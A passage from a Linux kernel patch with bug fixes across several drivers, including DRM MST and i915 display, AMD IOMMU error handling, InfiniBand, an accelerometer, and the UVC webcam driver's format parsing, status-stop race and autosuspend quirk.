+- * The MST topology state, or NULL if there's no topology state for this MST mgr
++ * The new MST topology state, or NULL if there's no topology state for this MST mgr
+  * in the global atomic state
+  */
+ struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr)
+ {
+-	struct drm_private_state *priv_state =
++	struct drm_private_state *new_priv_state =
+ 		drm_atomic_get_new_private_obj_state(state, &mgr->base);
+ 
+-	return priv_state ? to_dp_mst_topology_state(priv_state) : NULL;
++	return new_priv_state ? to_dp_mst_topology_state(new_priv_state) : NULL;
+ }
+ EXPORT_SYMBOL(drm_atomic_get_new_mst_topology_state);
+ 
+diff --git a/drivers/gpu/drm/i915/Kconfig b/drivers/gpu/drm/i915/Kconfig
+index 3efce05d7b57c..3a6e176d77aa5 100644
+--- a/drivers/gpu/drm/i915/Kconfig
++++ b/drivers/gpu/drm/i915/Kconfig
+@@ -107,9 +107,6 @@ config DRM_I915_USERPTR
+ 
+ 	  If in doubt, say "Y".
+ 
+-config DRM_I915_GVT
+-	bool
+-
+ config DRM_I915_GVT_KVMGT
+ 	tristate "Enable KVM host support Intel GVT-g graphics virtualization"
+ 	depends on DRM_I915
+@@ -160,3 +157,6 @@ menu "drm/i915 Unstable Evolution"
+ 	depends on DRM_I915
+ 	source "drivers/gpu/drm/i915/Kconfig.unstable"
+ endmenu
++
++config DRM_I915_GVT
++	bool
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index de77054195c68..4bbb84847ecb7 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5969,6 +5969,10 @@ int intel_modeset_all_pipes(struct intel_atomic_state *state)
+ 		if (ret)
+ 			return ret;
+ 
++		ret = intel_dp_mst_add_topology_state_for_crtc(state, crtc);
++		if (ret)
++			return ret;
++
+ 		ret = intel_atomic_add_affected_planes(state, crtc);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 03604a37931c6..27c2098dd7070 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -1003,3 +1003,64 @@ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state)
+ 	return crtc_state->mst_master_transcoder != INVALID_TRANSCODER &&
+ 	       crtc_state->mst_master_transcoder != crtc_state->cpu_transcoder;
+ }
++
++/**
++ * intel_dp_mst_add_topology_state_for_connector - add MST topology state for a connector
++ * @state: atomic state
++ * @connector: connector to add the state for
++ * @crtc: the CRTC @connector is attached to
++ *
++ * Add the MST topology state for @connector to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++static int
++intel_dp_mst_add_topology_state_for_connector(struct intel_atomic_state *state,
++					      struct intel_connector *connector,
++					      struct intel_crtc *crtc)
++{
++	struct drm_dp_mst_topology_state *mst_state;
++
++	if (!connector->mst_port)
++		return 0;
++
++	mst_state = drm_atomic_get_mst_topology_state(&state->base,
++						      &connector->mst_port->mst_mgr);
++	if (IS_ERR(mst_state))
++		return PTR_ERR(mst_state);
++
++	mst_state->pending_crtc_mask |= drm_crtc_mask(&crtc->base);
++
++	return 0;
++}
++
++/**
++ * intel_dp_mst_add_topology_state_for_crtc - add MST topology state for a CRTC
++ * @state: atomic state
++ * @crtc: CRTC to add the state for
++ *
++ * Add the MST topology state for @crtc to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc)
++{
++	struct drm_connector *_connector;
++	struct drm_connector_state *conn_state;
++	int i;
++
++	for_each_new_connector_in_state(&state->base, _connector, conn_state, i) {
++		struct intel_connector *connector = to_intel_connector(_connector);
++		int ret;
++
++		if (conn_state->crtc != &crtc->base)
++			continue;
++
++		ret = intel_dp_mst_add_topology_state_for_connector(state, connector, crtc);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
++}
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.h b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+index f7301de6cdfb3..f1815bb722672 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.h
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+@@ -8,6 +8,8 @@
+ 
+ #include <linux/types.h>
+ 
++struct intel_atomic_state;
++struct intel_crtc;
+ struct intel_crtc_state;
+ struct intel_digital_port;
+ struct intel_dp;
+@@ -18,5 +20,7 @@ int intel_dp_mst_encoder_active_links(struct intel_digital_port *dig_port);
+ bool intel_dp_mst_is_master_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_source_support(struct intel_dp *intel_dp);
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc);
+ 
+ #endif /* __INTEL_DP_MST_H__ */
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index 112aa0447a0dc..9899b5dcd291d 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -624,7 +624,13 @@ void intel_fbdev_set_suspend(struct drm_device *dev, int state, bool synchronous
+ 	struct intel_fbdev *ifbdev = dev_priv->display.fbdev.fbdev;
+ 	struct fb_info *info;
+ 
+-	if (!ifbdev || !ifbdev->vma)
++	if (!ifbdev)
++		return;
++
++	if (drm_WARN_ON(&dev_priv->drm, !HAS_DISPLAY(dev_priv)))
++		return;
++
++	if (!ifbdev->vma)
+ 		goto set_suspend;
+ 
+ 	info = ifbdev->helper.fbdev;
+diff --git a/drivers/iio/accel/mma9551_core.c b/drivers/iio/accel/mma9551_core.c
+index 64ca7d7a9673d..b898f865fb875 100644
+--- a/drivers/iio/accel/mma9551_core.c
++++ b/drivers/iio/accel/mma9551_core.c
+@@ -296,9 +296,12 @@ int mma9551_read_config_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_CONFIG,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_config_word, IIO_MMA9551);
+ 
+@@ -354,9 +357,12 @@ int mma9551_read_status_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_STATUS,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_status_word, IIO_MMA9551);
+ 
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 26d1772179b8f..8730674ceb2e1 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -479,13 +479,20 @@ static int compare_netdev_and_ip(int ifindex_a, struct sockaddr *sa,
+ 	if (sa->sa_family != sb->sa_family)
+ 		return sa->sa_family - sb->sa_family;
+ 
+-	if (sa->sa_family == AF_INET)
+-		return memcmp((char *)&((struct sockaddr_in *)sa)->sin_addr,
+-			      (char *)&((struct sockaddr_in *)sb)->sin_addr,
++	if (sa->sa_family == AF_INET &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in)) {
++		return memcmp(&((struct sockaddr_in *)sa)->sin_addr,
++			      &((struct sockaddr_in *)sb)->sin_addr,
+ 			      sizeof(((struct sockaddr_in *)sa)->sin_addr));
++	}
++
++	if (sa->sa_family == AF_INET6 &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in6)) {
++		return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
++				     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	}
+ 
+-	return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
+-			     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	return -1;
+ }
+ 
+ static int cma_add_id_to_tree(struct rdma_id_private *node_id_priv)
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index ebe970f76232d..90b672feed83d 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -1056,7 +1056,7 @@ static void read_link_down_reason(struct hfi1_devdata *dd, u8 *ldr);
+ static void handle_temp_err(struct hfi1_devdata *dd);
+ static void dc_shutdown(struct hfi1_devdata *dd);
+ static void dc_start(struct hfi1_devdata *dd);
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np);
+ static void clear_full_mgmt_pkey(struct hfi1_pportdata *ppd);
+ static int wait_link_transfer_active(struct hfi1_devdata *dd, int wait_ms);
+@@ -13362,7 +13362,6 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 	int ret;
+ 	unsigned ngroups;
+ 	int rmt_count;
+-	int user_rmt_reduced;
+ 	u32 n_usr_ctxts;
+ 	u32 send_contexts = chip_send_contexts(dd);
+ 	u32 rcv_contexts = chip_rcv_contexts(dd);
+@@ -13421,28 +13420,34 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 					 (num_kernel_contexts + n_usr_ctxts),
+ 					 &node_affinity.real_cpu_mask);
+ 	/*
+-	 * The RMT entries are currently allocated as shown below:
+-	 * 1. QOS (0 to 128 entries);
+-	 * 2. FECN (num_kernel_context - 1 + num_user_contexts +
+-	 *    num_netdev_contexts);
+-	 * 3. netdev (num_netdev_contexts).
+-	 * It should be noted that FECN oversubscribe num_netdev_contexts
+-	 * entries of RMT because both netdev and PSM could allocate any receive
+-	 * context between dd->first_dyn_alloc_text and dd->num_rcv_contexts,
+-	 * and PSM FECN must reserve an RMT entry for each possible PSM receive
+-	 * context.
++	 * RMT entries are allocated as follows:
++	 * 1. QOS (0 to 128 entries)
++	 * 2. FECN (num_kernel_context - 1 [a] + num_user_contexts +
++	 *          num_netdev_contexts [b])
++	 * 3. netdev (NUM_NETDEV_MAP_ENTRIES)
++	 *
++	 * Notes:
++	 * [a] Kernel contexts (except control) are included in FECN if kernel
++	 *     TID_RDMA is active.
++	 * [b] Netdev and user contexts are randomly allocated from the same
++	 *     context pool, so FECN must cover all contexts in the pool.
+ 	 */
+-	rmt_count = qos_rmt_entries(dd, NULL, NULL) + (num_netdev_contexts * 2);
+-	if (HFI1_CAP_IS_KSET(TID_RDMA))
+-		rmt_count += num_kernel_contexts - 1;
+-	if (rmt_count + n_usr_ctxts > NUM_MAP_ENTRIES) {
+-		user_rmt_reduced = NUM_MAP_ENTRIES - rmt_count;
+-		dd_dev_err(dd,
+-			   "RMT size is reducing the number of user receive contexts from %u to %d\n",
+-			   n_usr_ctxts,
+-			   user_rmt_reduced);
+-		/* recalculate */
+-		n_usr_ctxts = user_rmt_reduced;
++	rmt_count = qos_rmt_entries(num_kernel_contexts - 1, NULL, NULL)
++		    + (HFI1_CAP_IS_KSET(TID_RDMA) ? num_kernel_contexts - 1
++						  : 0)
++		    + n_usr_ctxts
++		    + num_netdev_contexts
++		    + NUM_NETDEV_MAP_ENTRIES;
++	if (rmt_count > NUM_MAP_ENTRIES) {
++		int over = rmt_count - NUM_MAP_ENTRIES;
++		/* try to squish user contexts, minimum of 1 */
++		if (over >= n_usr_ctxts) {
++			dd_dev_err(dd, "RMT overflow: reduce the requested number of contexts\n");
++			return -EINVAL;
++		}
++		dd_dev_err(dd, "RMT overflow: reducing # user contexts from %u to %u\n",
++			   n_usr_ctxts, n_usr_ctxts - over);
++		n_usr_ctxts -= over;
+ 	}
+ 
+ 	/* the first N are kernel contexts, the rest are user/netdev contexts */
+@@ -14299,15 +14304,15 @@ static void clear_rsm_rule(struct hfi1_devdata *dd, u8 rule_index)
+ }
+ 
+ /* return the number of RSM map table entries that will be used for QOS */
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np)
+ {
+ 	int i;
+ 	unsigned int m, n;
+-	u8 max_by_vl = 0;
++	uint max_by_vl = 0;
+ 
+ 	/* is QOS active at all? */
+-	if (dd->n_krcv_queues <= MIN_KERNEL_KCTXTS ||
++	if (n_krcv_queues < MIN_KERNEL_KCTXTS ||
+ 	    num_vls == 1 ||
+ 	    krcvqsset <= 1)
+ 		goto no_qos;
+@@ -14365,7 +14370,7 @@ static void init_qos(struct hfi1_devdata *dd, struct rsm_map_table *rmt)
+ 
+ 	if (!rmt)
+ 		goto bail;
+-	rmt_entries = qos_rmt_entries(dd, &m, &n);
++	rmt_entries = qos_rmt_entries(dd->n_krcv_queues - 1, &m, &n);
+ 	if (rmt_entries == 0)
+ 		goto bail;
+ 	qpns_per_vl = 1 << m;
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index 968e5e6668b26..20adb9b323d82 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -1712,27 +1712,29 @@ static int pdev_pri_ats_enable(struct pci_dev *pdev)
+ 	/* Only allow access to user-accessible pages */
+ 	ret = pci_enable_pasid(pdev, 0);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/* First reset the PRI state of the device */
+ 	ret = pci_reset_pri(pdev);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	/* Enable PRI */
+ 	/* FIXME: Hardcode number of outstanding requests for now */
+ 	ret = pci_enable_pri(pdev, 32);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	ret = pci_enable_ats(pdev, PAGE_SHIFT);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pri;
+ 
+ 	return 0;
+ 
+-out_err:
++out_err_pri:
+ 	pci_disable_pri(pdev);
++
++out_err_pasid:
+ 	pci_disable_pasid(pdev);
+ 
+ 	return ret;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index fd8c8aeb3c504..bfb2f163c6914 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -2089,8 +2089,22 @@ static int __iommu_attach_group(struct iommu_domain *domain,
+ 
+ 	ret = __iommu_group_for_each_dev(group, domain,
+ 					 iommu_group_do_attach_device);
+-	if (ret == 0)
++	if (ret == 0) {
+ 		group->domain = domain;
++	} else {
++		/*
++		 * To recover from the case when certain device within the
++		 * group fails to attach to the new domain, we need force
++		 * attaching all devices back to the old domain. The old
++		 * domain is compatible for all devices in the group,
++		 * hence the iommu driver should always return success.
++		 */
++		struct iommu_domain *old_domain = group->domain;
++
++		group->domain = NULL;
++		WARN(__iommu_group_set_domain(group, old_domain),
++		     "iommu driver failed to attach a compatible domain");
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 44b0cfb8ee1c7..067b43a1cb3eb 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -1509,6 +1510,10 @@ static void uvc_ctrl_status_event_work(struct work_struct *work)
+ 
+ 	uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
+ 
++	/* The barrier is needed to synchronize with uvc_status_stop(). */
++	if (smp_load_acquire(&dev->flush_status))
++		return;
++
+ 	/* Resubmit the URB. */
+ 	w->urb->interval = dev->int_ep->desc.bInterval;
+ 	ret = usb_submit_urb(w->urb, GFP_KERNEL);
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index abfe735f6ea30..a9cdef07e6b14 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -252,14 +252,10 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		fmtdesc = uvc_format_by_guid(&buffer[5]);
+ 
+ 		if (fmtdesc != NULL) {
+-			strscpy(format->name, fmtdesc->name,
+-				sizeof(format->name));
+ 			format->fcc = fmtdesc->fcc;
+ 		} else {
+ 			dev_info(&streaming->intf->dev,
+ 				 "Unknown video format %pUl\n", &buffer[5]);
+-			snprintf(format->name, sizeof(format->name), "%pUl\n",
+-				&buffer[5]);
+ 			format->fcc = 0;
+ 		}
+ 
+@@ -271,8 +267,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		 */
+ 		if (dev->quirks & UVC_QUIRK_FORCE_Y8) {
+ 			if (format->fcc == V4L2_PIX_FMT_YUYV) {
+-				strscpy(format->name, "Greyscale 8-bit (Y8  )",
+-					sizeof(format->name));
+ 				format->fcc = V4L2_PIX_FMT_GREY;
+ 				format->bpp = 8;
+ 				width_multiplier = 2;
+@@ -313,7 +307,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strscpy(format->name, "MJPEG", sizeof(format->name));
+ 		format->fcc = V4L2_PIX_FMT_MJPEG;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED;
+ 		format->bpp = 0;
+@@ -329,17 +322,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		switch (buffer[8] & 0x7f) {
+-		case 0:
+-			strscpy(format->name, "SD-DV", sizeof(format->name));
+-			break;
+-		case 1:
+-			strscpy(format->name, "SDL-DV", sizeof(format->name));
+-			break;
+-		case 2:
+-			strscpy(format->name, "HD-DV", sizeof(format->name));
+-			break;
+-		default:
++		if ((buffer[8] & 0x7f) > 2) {
+ 			uvc_dbg(dev, DESCR,
+ 				"device %d videostreaming interface %d: unknown DV format %u\n",
+ 				dev->udev->devnum,
+@@ -347,9 +330,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strlcat(format->name, buffer[8] & (1 << 7) ? " 60Hz" : " 50Hz",
+-			sizeof(format->name));
+-
+ 		format->fcc = V4L2_PIX_FMT_DV;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED | UVC_FMT_FLAG_STREAM;
+ 		format->bpp = 0;
+@@ -376,7 +356,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		return -EINVAL;
+ 	}
+ 
+-	uvc_dbg(dev, DESCR, "Found format %s\n", format->name);
++	uvc_dbg(dev, DESCR, "Found format %p4cc", &format->fcc);
+ 
+ 	buflen -= buffer[0];
+ 	buffer += buffer[0];
+@@ -880,10 +860,8 @@ static int uvc_parse_vendor_control(struct uvc_device *dev,
+ 					       + n;
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], 2*n);
+ 
+-		if (buffer[24+p+2*n] != 0)
+-			usb_string(udev, buffer[24+p+2*n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[24+p+2*n] == 0 ||
++		    usb_string(udev, buffer[24+p+2*n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1007,15 +985,15 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 			memcpy(term->media.bmTransportModes, &buffer[10+n], p);
+ 		}
+ 
+-		if (buffer[7] != 0)
+-			usb_string(udev, buffer[7], term->name,
+-				   sizeof(term->name));
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
+-			sprintf(term->name, "Camera %u", buffer[3]);
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
+-			sprintf(term->name, "Media %u", buffer[3]);
+-		else
+-			sprintf(term->name, "Input %u", buffer[3]);
++		if (buffer[7] == 0 ||
++		    usb_string(udev, buffer[7], term->name, sizeof(term->name)) < 0) {
++			if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
++				sprintf(term->name, "Camera %u", buffer[3]);
++			if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
++				sprintf(term->name, "Media %u", buffer[3]);
++			else
++				sprintf(term->name, "Input %u", buffer[3]);
++		}
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+ 		break;
+@@ -1048,10 +1026,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(term->baSourceID, &buffer[7], 1);
+ 
+-		if (buffer[8] != 0)
+-			usb_string(udev, buffer[8], term->name,
+-				   sizeof(term->name));
+-		else
++		if (buffer[8] == 0 ||
++		    usb_string(udev, buffer[8], term->name, sizeof(term->name)) < 0)
+ 			sprintf(term->name, "Output %u", buffer[3]);
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+@@ -1073,10 +1049,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(unit->baSourceID, &buffer[5], p);
+ 
+-		if (buffer[5+p] != 0)
+-			usb_string(udev, buffer[5+p], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[5+p] == 0 ||
++		    usb_string(udev, buffer[5+p], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Selector %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1106,10 +1080,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		if (dev->uvc_version >= 0x0110)
+ 			unit->processing.bmVideoStandards = buffer[9+n];
+ 
+-		if (buffer[8+n] != 0)
+-			usb_string(udev, buffer[8+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[8+n] == 0 ||
++		    usb_string(udev, buffer[8+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Processing %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1137,10 +1109,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		unit->extension.bmControls = (u8 *)unit + sizeof(*unit);
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], n);
+ 
+-		if (buffer[23+p+n] != 0)
+-			usb_string(udev, buffer[23+p+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[23+p+n] == 0 ||
++		    usb_string(udev, buffer[23+p+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -2483,6 +2453,24 @@ static const struct usb_device_id uvc_ids[] = {
+ 	  .bInterfaceSubClass	= 1,
+ 	  .bInterfaceProtocol	= 0,
+ 	  .driver_info		= (kernel_ulong_t)&uvc_quirk_probe_minmax },
++	/* Logitech, Webcam C910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0821,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
++	/* Logitech, Webcam B910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0823,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
+ 	/* Logitech Quickcam Fusion */
+ 	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
+ 				| USB_DEVICE_ID_MATCH_INT_INFO,
+diff --git a/drivers/media/usb/uvc/uvc_entity.c b/drivers/media/usb/uvc/uvc_entity.c
+index 7c4d2f93d3513..cc68dd24eb42d 100644
+--- a/drivers/media/usb/uvc/uvc_entity.c
++++ b/drivers/media/usb/uvc/uvc_entity.c
+@@ -37,7 +37,7 @@ static int uvc_mc_create_links(struct uvc_video_chain *chain,
+ 			continue;
+ 
+ 		remote = uvc_entity_by_id(chain->dev, entity->baSourceID[i]);
+-		if (remote == NULL)
++		if (remote == NULL || remote->num_pads == 0)
+ 			return -EINVAL;
+ 
+ 		source = (UVC_ENTITY_TYPE(remote) == UVC_TT_STREAMING)
+diff --git a/drivers/media/usb/uvc/uvc_status.c b/drivers/media/usb/uvc/uvc_status.c
+index 7518ffce22edb..4a92c989cf335 100644
+--- a/drivers/media/usb/uvc/uvc_status.c
++++ b/drivers/media/usb/uvc/uvc_status.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/kernel.h>
+ #include <linux/input.h>
+ #include <linux/slab.h>
+@@ -309,5 +310,41 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags)
+ 
+ void uvc_status_stop(struct uvc_device *dev)
+ {
++	struct uvc_ctrl_work *w = &dev->async_ctrl;
++
++	/*
++	 * Prevent the asynchronous control handler from requeing the URB. The
++	 * barrier is needed so the flush_status change is visible to other
++	 * CPUs running the asynchronous handler before usb_kill_urb() is
++	 * called below.
++	 */
++	smp_store_release(&dev->flush_status, true);
++
++	/*
++	 * Cancel any pending asynchronous work. If any status event was queued,
++	 * process it synchronously.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/* Kill the urb. */
+ 	usb_kill_urb(dev->int_urb);
++
++	/*
++	 * The URB completion handler may have queued asynchronous work. This
++	 * won't resubmit the URB as flush_status is set, but it needs to be
++	 * cancelled before returning or it could then race with a future
++	 * uvc_status_start() call.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/*
++	 * From this point, there are no events on the queue and the status URB
++	 * is dead. No events will be queued until uvc_status_start() is called.
++	 * The barrier is needed to make sure that flush_status is visible to
++	 * uvc_ctrl_status_event_work() when uvc_status_start() will be called
++	 * again.
++	 */
++	smp_store_release(&dev->flush_status, false);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index 0774a11360c03..950b42d78a107 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -661,8 +661,6 @@ static int uvc_ioctl_enum_fmt(struct uvc_streaming *stream,
+ 	fmt->flags = 0;
+ 	if (format->flags & UVC_FMT_FLAG_COMPRESSED)
+ 		fmt->flags |= V4L2_FMT_FLAG_COMPRESSED;
+-	strscpy(fmt->description, format->name, sizeof(fmt->description));
+-	fmt->description[sizeof(fmt->description) - 1] = 0;
+ 	fmt->pixelformat = format->fcc;
+ 	return 0;
+ }
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index d2eb9066e4dcc..0d3a3b697b2d8 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -1352,7 +1352,9 @@ static void uvc_video_decode_meta(struct uvc_streaming *stream,
+ 	if (has_scr)
+ 		memcpy(stream->clock.last_scr, scr, 6);
+ 
+-	memcpy(&meta->length, mem, length);
++	meta->length = mem[0];
++	meta->flags  = mem[1];
++	memcpy(meta->buf, &mem[2], length - 2);
+ 	meta_buf->bytesused += length + sizeof(meta->ns) + sizeof(meta->sof);
+ 
+ 	uvc_dbg(stream->dev, FRAME,
+@@ -1965,6 +1967,17 @@ static int uvc_video_start_transfer(struct uvc_streaming *stream,
+ 			"Selecting alternate setting %u (%u B/frame bandwidth)\n",
+ 			altsetting, best_psize);
+ 
++		/*
++		 * Some devices, namely the Logitech C910 and B910, are unable
++		 * to recover from a USB autosuspend, unless the alternate
++		 * setting of the streaming interface is toggled.
++		 */
++		if (stream->dev->quirks & UVC_QUIRK_WAKE_AUTOSUSPEND) {
++			usb_set_interface(stream->dev->udev, intfnum,
++					  altsetting);
++			usb_set_interface(stream->dev->udev, intfnum, 0);
++		}
++
+ 		ret = usb_set_interface(stream->dev->udev, intfnum, altsetting);
+ 		if (ret < 0)
+ 			return ret;
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index 1227ae63f85b7..33e7475d4e64a 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -74,6 +74,7 @@
+ #define UVC_QUIRK_RESTORE_CTRLS_ON_INIT	0x00000400
+ #define UVC_QUIRK_FORCE_Y8		0x00000800
+ #define UVC_QUIRK_FORCE_BPP		0x00001000
++#define UVC_QUIRK_WAKE_AUTOSUSPEND	0x00002000
+ 
+ /* Format flags */
+ #define UVC_FMT_FLAG_COMPRESSED		0x00000001
+@@ -264,8 +265,6 @@ struct uvc_format {
